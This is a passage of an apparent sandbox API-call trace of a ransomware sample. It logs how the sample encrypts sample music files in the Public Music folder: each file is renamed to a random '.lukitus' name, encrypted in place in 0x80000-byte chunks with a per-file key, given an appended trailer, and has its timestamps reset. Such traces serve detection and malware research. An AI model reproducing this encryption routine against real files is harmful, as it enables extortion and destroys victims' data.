pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.538] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa8e5, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa8e5, lpOverlapped=0x0) returned 1 [0109.538] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.538] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa8e5, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa8e5, lpOverlapped=0x0) returned 1 [0109.538] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x654f4730, dwHighDateTime=0x1d31760)) [0109.539] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.539] FlushFileBuffers (hFile=0x328) returned 1 [0109.542] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1)) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.543] CreateFileW (lpFileName="c:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.543] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="c:\\Users\\Public\\Music\\Sample Music\\F56924BE-9663-41BB-E7ED6FE8-82778B4CB908.lukitus" (normalized: "c:\\users\\public\\music\\sample music\\f56924be-9663-41bb-e7ed6fe8-82778b4cb908.lukitus"), dwFlags=0x9) returned 1 [0109.545] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.545] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.549] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.565] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.565] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.568] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.569] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0109.569] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.570] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.578] SetFilePointer (in: hFile=0x328, lDistanceToMove=1048576, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x100000 [0109.578] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.579] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.582] SetFilePointer (in: hFile=0x328, lDistanceToMove=1572864, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x180000 [0109.582] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.583] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.600] SetFilePointer (in: hFile=0x328, lDistanceToMove=2097152, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x200000 [0109.600] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.600] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.621] SetFilePointer (in: hFile=0x328, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x280000 [0109.621] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.622] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.630] SetFilePointer (in: hFile=0x328, lDistanceToMove=3145728, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x300000 [0109.630] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.631] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.633] SetFilePointer (in: hFile=0x328, lDistanceToMove=3670016, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x380000 [0109.633] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.634] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.645] SetFilePointer (in: hFile=0x328, lDistanceToMove=4194304, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x400000 [0109.645] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.646] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.662] SetFilePointer (in: hFile=0x328, lDistanceToMove=4718592, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x480000 [0109.662] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.663] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.673] SetFilePointer (in: hFile=0x328, lDistanceToMove=5242880, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x500000 [0109.673] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.674] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.677] SetFilePointer (in: hFile=0x328, lDistanceToMove=5767168, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x580000 [0109.677] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.677] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.695] SetFilePointer (in: hFile=0x328, lDistanceToMove=6291456, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x600000 [0109.695] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.696] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.703] SetFilePointer (in: hFile=0x328, lDistanceToMove=6815744, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x680000 [0109.703] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.704] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.717] SetFilePointer (in: hFile=0x328, lDistanceToMove=7340032, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x700000 [0109.717] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.718] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.719] SetFilePointer (in: hFile=0x328, lDistanceToMove=7864320, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x780000 [0109.719] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.720] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x64f1, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x64f1, lpOverlapped=0x0) returned 1 [0109.725] SetFilePointer (in: hFile=0x328, lDistanceToMove=8388608, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x800000 [0109.725] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x64f1, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x64f1, lpOverlapped=0x0) returned 1 [0109.725] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.725] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x656bd7b0, dwHighDateTime=0x1d31760)) [0109.725] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.725] FlushFileBuffers (hFile=0x328) returned 1 [0109.802] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.803] CreateFileW (lpFileName="c:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.803] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="c:\\Users\\Public\\Music\\Sample Music\\F56924BE-9663-41BB-FCD298FA-818189779DE9.lukitus" (normalized: "c:\\users\\public\\music\\sample music\\f56924be-9663-41bb-fcd298fa-818189779de9.lukitus"), dwFlags=0x9) returned 1 [0109.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.805] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.810] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.832] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.832] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.834] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.837] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0109.837] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.838] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.846] SetFilePointer (in: hFile=0x328, lDistanceToMove=1048576, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x100000 [0109.846] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.847] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.852] SetFilePointer (in: hFile=0x328, lDistanceToMove=1572864, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x180000 [0109.852] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.853] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0109.863] SetFilePointer (in: hFile=0x328, 